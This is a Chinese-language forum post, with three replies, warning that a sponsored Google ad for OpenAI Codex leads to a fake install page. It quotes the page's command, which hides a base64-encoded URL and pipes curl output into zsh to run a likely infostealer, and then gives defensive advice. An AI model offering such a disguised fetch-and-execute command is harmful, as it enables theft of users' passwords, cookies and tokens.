在谷歌搜索 OpenAI Codex 时点进赞助商广告

脚本小子阿强 初级 15小时前 689 浏览 0 点赞 约 1 分钟

很多习惯先搜谷歌再安装工具的朋友得小心了,现在的广告位水深得可怕。有个哥们儿在搜 OpenAI Codex 的时候,点进了排在第一位的赞助商链接,结果被带到了一个用 Google Pages 托管的伪造安装页面。最阴险的是,它给出的安装命令利用了 Base64 编码把恶意链接藏了起来,骗用户直接在终端执行。

具体的坑点在于这段命令:

echo "npm install -g u/openai/codex https://openai.com/codex/" && curl -s $(echo "<base64 encoded URL>" | openssl base64 -d -A) | zsh

乍一看,前面的 echo 打印出的是正规的 npm 安装路径,让人放下戒心。但实际上,真正的 payload 藏在后面的 Base64 编码里,解码后是一个完全无关的第三方服务器地址。这个操作本质上就是通过 curl 下载一个远程脚本并直接交给 zsh 执行。

这种攻击最恶心的地方在于它可能是个“一次性”的信息窃取者(Infostealer)。即便你在系统里检查 LaunchAgents、.zshrc 或者 /tmp 目录没发现异常进程,也不代表安全。这类脚本通常在执行瞬间就完成了对 Chrome 密码、Cookies、Keychain 密钥以及各种 API Token 的扫描并上传,然后迅速退出,不留任何持久化痕迹。

为了避免踩坑,建议大家在实操安装任何 AI 开发者工具时遵循以下原则:

  • 核对域名: 别因为它是 Google 搜索的第一条就信任,一定要确认 URL 是官方域。
  • 审视管道符: 凡是看到 curl ... | sh 或者 curl ... | zsh 这种直接把远程内容喂给 shell 的操作,必须先手动下载脚本检查代码。
  • 警惕编码隐藏: 看到命令里出现 base64 -d 这种解码操作,基本可以判定对方在隐藏真实的请求路径。

如果你之前通过 Homebrew 安装过官方签名(Developer ID Application: OpenAI OpCo, LLC)的二进制文件,那是安全的。但千万不要在不确认来源的情况下,随手把一段复杂的 shell 命令粘贴到终端里。
GoogleOpenAI CodexzshInfostealer

全部回复 (3)

小柯爱学习 专家 15小时前
建议检查下环境变量,我之前被坑过,清理掉才好使。
0 回复
小Kevin在路上 中级 15小时前
现在很多这种假页,建议直接搜官网域名,别点赞助商。
0 回复
早八人AI炼丹师 专家 15小时前
我也中过招,之前装个库点错了广告,结果电脑直接卡死。
0 回复

发表回复

支持 Markdown 格式